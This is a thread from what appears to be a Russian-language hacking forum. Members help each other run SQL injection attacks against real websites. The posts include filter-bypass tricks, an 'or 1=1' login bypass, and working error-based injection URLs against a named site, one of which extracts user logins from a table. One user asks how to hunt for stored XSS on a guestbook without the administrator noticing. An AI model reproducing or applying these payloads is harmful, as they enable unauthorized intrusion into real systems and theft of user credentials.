13.01.2012, 20:06
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Все + замени на /**/, а коммент на /*. Убери кавычку и т.д.
|
|
|
13.01.2012, 20:12
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от shadowrun
не
можно попытаться обойти авторизацию, с помощью or 1=1,но тут нужно смотреть на примере. и ещё - я на 90% уверен, что на сайте есть инъекция и в get запросе.
|
|
|
|
13.01.2012, 20:17
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Сообщение от Ereee
Все + замени на /**/, а коммент на /*. Убери кавычку и т.д.
почти прокатил теперь, ска на коммент маериться
Сообщение от None
syntax to use near '/*'
если без коммента, то
Сообщение от None
syntax to use near ''
Спасибо, подобрал .
|
|
|
|
13.01.2012, 21:00
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Бле, не даром пятн 13
Теперь, когда пытаюсь вывести login пишет следующую хрень:
Сообщение от None
Warning: mysql_query() [function.mysql-query]: Unable to save result set in...
Subquery returns more than 1 row
|
|
|
|
13.01.2012, 21:04
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от shadowrun
Бле, не даром пятн 13
Теперь, когда пытаюсь вывести login пишет следующую хрень:
LIMIT юзай
|
|
|
|
13.01.2012, 21:40
|
|
Познающий
Регистрация: 03.06.2011
Сообщений: 85
С нами:
7864886
Репутация:
0
|
|
HElp SQli
Сообщение от None
Invalid SQL Query!
http://www.adult-images.net/view_comments.php?gal=-455' /*!union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- - |
|
|
|
13.01.2012, 21:47
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от oODungVTOo
HElp SQli
Код:
http://www.adult-images.net/view_comments.php?gal=455'+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+1
Ctrl+A
Код:
Duplicate entry 'COLLATIONS1' for key 'group_key'
|
|
|
|
13.01.2012, 22:21
|
|
Новичок
Регистрация: 31.12.2011
Сообщений: 25
С нами:
7561046
Репутация:
0
|
|
Скажите , меня интересует такой вопрос : пока я в гостевой ищю активную xss я вписываю разные вещи в поля чтобы найти xss, а редактировать свои сообщения нельзя , то даже когда я найду активную xss то админ гостевой зайдет и увидит кучу разных подозрительных сообщений которые я писал чтобы найти xss и прикроет дырку, и я не смогу этим ничего сделать. И даже пользователи что то заподозрят. Как можно искать активную xss незаметно чтобы обойтись только одним сообщением?(если нельзя редактировать) и чтобы никто ничего не заметил. Я вот это понять не могу. Заранее спасибо за ответ.
|
|
|
|
14.01.2012, 00:39
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Сообщение от Expl0ited
LIMIT юзай
Можно подробней?
|
|
|
|
14.01.2012, 01:12
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от shadowrun
Можно подробней?
кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку.
Сообщение от None
admin'or+1+and(select+1+from(select+count(*),conca t((select+login+from+cosm_users+
limit+0,1
),floor(rand(0)*2))x+from+information_schema.table s+grou p+by+x)a)--+a
limit+0,1 при выводе логина, ты скорее всего упустил.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
